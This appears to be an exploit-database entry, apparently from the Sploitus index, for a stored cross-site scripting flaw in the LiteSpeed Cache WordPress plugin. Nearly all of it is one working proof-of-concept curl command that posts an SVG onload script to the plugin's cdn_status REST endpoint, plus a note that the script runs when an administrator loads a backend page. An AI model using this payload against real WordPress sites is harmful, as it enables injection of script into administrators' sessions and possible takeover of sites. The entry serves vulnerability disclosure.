Share
## https://sploitus.com/exploit?id=WPEX-ID:DD9054CC-1259-427D-A4AD-1875B7B2B3B4
curl -X POST --data 'success=0&result[_msg]=<svg/onload=alert(/XSS/)>' https://example.com/wp-json/litespeed/v1/cdn_status

The XSS will be triggered (once) when an admin will access any page of the backend